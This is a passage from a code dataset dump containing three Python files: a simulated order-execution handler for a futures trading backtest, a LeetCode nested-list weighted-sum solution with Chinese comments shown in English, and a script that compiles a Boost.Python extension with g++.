F.sigmoid(self.fc2(x))\n","sub_path":"deepvoice3_pytorch/deepvoice3.py","file_name":"deepvoice3.py","file_ext":"py","file_size_in_byte":28626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"161168040","text":"import logging\nimport random\nimport numpy as np\nimport datetime as dt\nfrom data_utils.quantgo_utils import get_data_multi\nfrom events import CMEBacktestFillEvent\nfrom trading.execution import ExecutionHandler\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s: %(message)s')\nlog = logging.getLogger('Backtest')\n\n\nCME_HISTORICAL_ORDER_DELAY = dt.timedelta(seconds=.01)\nCME_HISTORICAL_TRANSACTION_COST = 0\nMARKET_ORDERS = True\nLIMIT_FILL_PROBABILITY = 0.1\n\n\nclass BacktestExecution(ExecutionHandler):\n def __init__(self, events, products, second_bars=True, commission=None):\n super(BacktestExecution, self).__init__(events)\n self.products = 
products\n self.second_bars = second_bars\n self.commission = commission if commission is not None else CME_HISTORICAL_TRANSACTION_COST\n self.resting_orders = []\n self.curr_day_data = None\n\n def process_new_order(self, order_event):\n \"\"\"\n Updates the current_day_data and places the order.\n :param order_event: (OrderEvent)\n \"\"\"\n self._check_day_data(order_event.order_time)\n self.place_order(order_event)\n\n def process_resting_orders(self, market_event):\n \"\"\"\n On new market update, check resting orders to see if they can be filled.\n :param market_event:\n \"\"\"\n if not self.resting_orders:\n return\n for resting_order in list(self.resting_orders):\n fill_time = self._get_fill_time(market_event.datetime, resting_order.symbol)\n direction = self._get_order_direction(resting_order)\n if direction == 1:\n if self._check_fill_limit_buy(resting_order, fill_time) is True:\n self._fill_limit_order(resting_order, fill_time)\n self.resting_orders.remove(resting_order)\n elif direction == -1:\n if self._check_fill_limit_sell(resting_order, fill_time) is True:\n self._fill_limit_order(resting_order, fill_time)\n self.resting_orders.remove(resting_order)\n\n def place_order(self, order_event):\n \"\"\"\n Places a MARKET/LIMIT order.\n :param order_event:\n \"\"\"\n self._check_day_data(order_event.order_time)\n if order_event.order_type == 'MARKET':\n self._fill_market_order(order_event)\n elif order_event.order_type == 'LIMIT':\n if self._check_limit_order(order_event, order_event.order_time):\n pass\n self.resting_orders.append(order_event)\n\n def _check_limit_order(self, order_event, dt):\n pass\n\n def _fill_market_order(self, order_event):\n \"\"\"\n Fills a market order by crossing the spread at the current best bid/offer\n \"\"\"\n if order_event.quantity == 0:\n return\n fill_time = self._get_fill_time(order_event.order_time, order_event.symbol)\n sym_data = self.curr_day_data[order_event.symbol]\n direction = self._get_order_direction(order_event)\n if direction == 1:\n fill_price = sym_data['level_1_price_sell'].asof(fill_time)\n self.create_fill_event(order_event, fill_price, fill_time)\n elif direction == -1:\n fill_price = sym_data['level_1_price_buy'].asof(fill_time)\n self.create_fill_event(order_event, fill_price, fill_time)\n\n def _fill_limit_order(self, order_event, fill_time):\n if order_event.quantity == 0:\n return\n direction = self._get_order_direction(order_event)\n sym_data = self.curr_day_data[order_event.symbol]\n if direction == 1:\n fill_price = sym_data['level_1_price_buy'].asof(fill_time)\n self.create_fill_event(order_event, fill_price, fill_time)\n elif direction == -1:\n fill_price = sym_data['level_1_price_sell'].asof(fill_time)\n self.create_fill_event(order_event, fill_price, fill_time)\n\n def _check_fill_limit_buy(self, resting_order, fill_time):\n \"\"\"\n Conditions to fill a limit order (BUY)\n \"\"\"\n symbol = resting_order.symbol\n if resting_order.price < self.curr_day_data[symbol]['level_1_price_sell'].asof(fill_time) and \\\n self._limit_fill() is True or \\\n resting_order.price >= self.curr_day_data[symbol]['level_1_price_sell'].asof(fill_time):\n return True\n return False\n\n def _check_fill_limit_sell(self, resting_order, fill_time):\n \"\"\"\n Conditions to fill a limit order (SELL)\n \"\"\"\n symbol = resting_order.symbol\n if resting_order.price > self.curr_day_data[symbol]['level_1_price_buy'].asof(fill_time) and \\\n self._limit_fill() is True or \\\n resting_order.price <= self.curr_day_data[symbol]['level_1_price_buy'].asof(fill_time):\n return True\n return False\n\n def 
clear_resting_orders(self):\n if len(self.resting_orders) > 0:\n self.resting_orders = []\n\n def _get_fill_time(self, order_time, symbol):\n \"\"\"\n Applies a delay to the order_time and returns the time of the data for which the order can be filled.\n \"\"\"\n execution_time = order_time + CME_HISTORICAL_ORDER_DELAY\n fill_time = self.curr_day_data[symbol].index.asof(execution_time)\n return fill_time\n\n def create_fill_event(self, order_event, fill_price, fill_time):\n fill_cost = float(order_event.quantity*fill_price)\n fill_event = CMEBacktestFillEvent(order_event.order_time, fill_time, order_event.symbol,\n order_event.quantity, fill_price, fill_cost,\n commission=self.commission)\n self.events.put(fill_event)\n\n def _check_day_data(self, datetime):\n \"\"\"\n Check if data for the current day (based on orders) exists; if not, get the data.\n On a new day change, clears all resting orders.\n \"\"\"\n if self.curr_day_data is None or self.compare_dates(self.curr_day_data.index[0], datetime) is False:\n date = dt.datetime(year=datetime.year, month=datetime.month, day=datetime.day)\n symbols = [product.symbol for product in self.products]\n self.curr_day_data = get_data_multi(symbols, date, second_bars=self.second_bars)\n self.clear_resting_orders()\n\n @staticmethod\n def _get_order_direction(order_event):\n \"\"\"\n Returns the direction of the order:\n 1: BUY\n -1: SELL\n \"\"\"\n return np.sign(order_event.quantity)\n\n @staticmethod\n def compare_dates(dt1, dt2):\n \"\"\"\n Check if datetime dates are the same.\n :param dt1: (DateTime)\n :param dt2: (DateTime)\n :return: (bool)\n \"\"\"\n return dt1.year == dt2.year and dt1.month == dt2.month and dt1.day == dt2.day\n\n @staticmethod\n def _limit_fill():\n \"\"\"\n Probability function for limit fill.\n \"\"\"\n z = random.randint(0, 10)\n if z/10.0 < LIMIT_FILL_PROBABILITY:\n return True\n else:\n return False\n","sub_path":"backtest/execution.py","file_name":"execution.py","file_ext":"py","file_size_in_byte":7134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"75632452","text":"# The problem gives a list whose elements are all NestedInteger objects. Each NestedInteger can hold a single integer, a list, or a list that nests further lists.\n# Return the sum of all integers in the list, where each integer is weighted by its nesting depth.\n# The NestedInteger interface provides several methods; the ones used here are:\n# isInteger(self): returns True if the object holds a single integer, False if it holds a list\n# getInteger(self): returns the integer if the object holds one, otherwise (list case) returns None\n# getList(self): returns the nested list if the object holds one, otherwise (integer case) returns None\n\n\n# Approach 1: recursive DFS\n# Time complexity: O(N), where N is the number of nested lists plus the number of integers.\n# Space complexity: O(N); the DFS stack can nest up to N levels deep.\nclass Solution:\n def depthSum(self, nestedList: List[NestedInteger]) -> int:\n # DFS\n def getSum(nestList, level):\n # local variable result accumulates the weighted sum\n result = 0\n # iterate over the list\n for element in nestList:\n # check whether the element is a single integer\n if element.isInteger():\n # single integer: add value * depth to the result\n result += element.getInteger() * level\n else:\n # list: recurse with level + 1\n result += getSum(element.getList(), level + 1)\n # return the partial result\n return result\n\n return getSum(nestedList, 1)\n\n","sub_path":"面试-LeetCode题/基础算法3-DFS深度优先搜索/LeetCode339(NestedListWeightSum)/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"634736022","text":"from subprocess import call as shell_call\nfrom distutils import sysconfig\nimport scitbx\n\nobj_name = \"img_stream_ext\"\npy_inc_path = sysconfig.get_python_inc()\nprint(\"\\n sysconfig.get_python_inc() =\", py_inc_path)\nfor pos, single_shar in enumerate(py_inc_path):\n if(single_shar 
== \"/\" ):\n cut_py_inc_path = py_inc_path[0:pos]\n\nscitbx_path = scitbx.__path__[0]\nprint(\"\\n scitbx_path =\", scitbx_path)\ncut_scitbx_path = scitbx_path[0:-6]\nprint(\"cut_scitbx_path =\", cut_scitbx_path)\n\ndict_conf_vars = sysconfig.get_config_vars()\nprint(\"\\n\", dict_conf_vars[\"prefix\"])\nprefix_path = dict_conf_vars[\"prefix\"]\ncut_prefix = prefix_path[0:-10]\nprint(\"cut_prefix =\", cut_prefix)\ninc_path = cut_prefix + \"build/include\"\nprint(\"inc_path =\", inc_path)\n\ncom_lin_01 = \"g++ -I\" + py_inc_path \\\n + \" -I\" + cut_py_inc_path + \" -fPIC -c \" \\\n + \" -I\" + cut_scitbx_path \\\n + \" -I\" + inc_path \\\n + \" \" + obj_name + \".cpp\"\n\nlib_path = sysconfig.get_python_lib()\n\nfor pos, single_shar in enumerate(lib_path):\n if(single_shar == \"/\" ):\n cut_lib_path = lib_path[0:pos]\n\nfor pos, single_shar in enumerate(cut_lib_path):\n if(single_shar == \"/\" ):\n cut_cut_lib_path = cut_lib_path[0:pos]\n\n\ncom_lin_02 = \"g++ -shared \" + obj_name + \".o -L\" + \\\n cut_cut_lib_path + \" -lboost_python38 -L\" + \\\n cut_lib_path + \"/config -lpython3.8 -o \" + obj_name + \".so\"\n\nprint(\"\\n Compiling line 1:\")\nprint(\"cmd =\", com_lin_01, \"\\n\")\nerr_msg_01 = shell_call(com_lin_01, shell=True)\nprint(\"\\n Compiling line 2:\")\nprint(\"cmd =\", com_lin_02, \"\\n\")\nerr_msg_02 = shell_call(com_lin_02, shell=True)\nprint(\"\\n Done compiling\")\n\nif(err_msg_01 != 0 or err_msg_02 !=0 ):\n print(\"Failed to compile some C++ extensions \")\n","sub_path":"lui_testing/py3_pyside2_n_dui2/imgs_n_numpy_n_sockets/flex_arr_01/compyling_boost_ext.py","file_name":"compyling_boost_ext.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"}
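Note on the path handling in compyling_boost_ext.py above: each character-scanning loop over single_shar keeps the substring up to the last "/" in a path, which is what os.path.dirname already computes. A minimal sketch of that substitution, assuming only the standard library (the variable names mirror the script; everything else is an assumption, not part of the original):

import os
from distutils import sysconfig

# Parent directories via os.path.dirname instead of scanning for "/" by hand.
py_inc_path = sysconfig.get_python_inc()
cut_py_inc_path = os.path.dirname(py_inc_path)    # replaces the first single_shar loop

lib_path = sysconfig.get_python_lib()
cut_lib_path = os.path.dirname(lib_path)          # replaces the second loop
cut_cut_lib_path = os.path.dirname(cut_lib_path)  # replaces the third loop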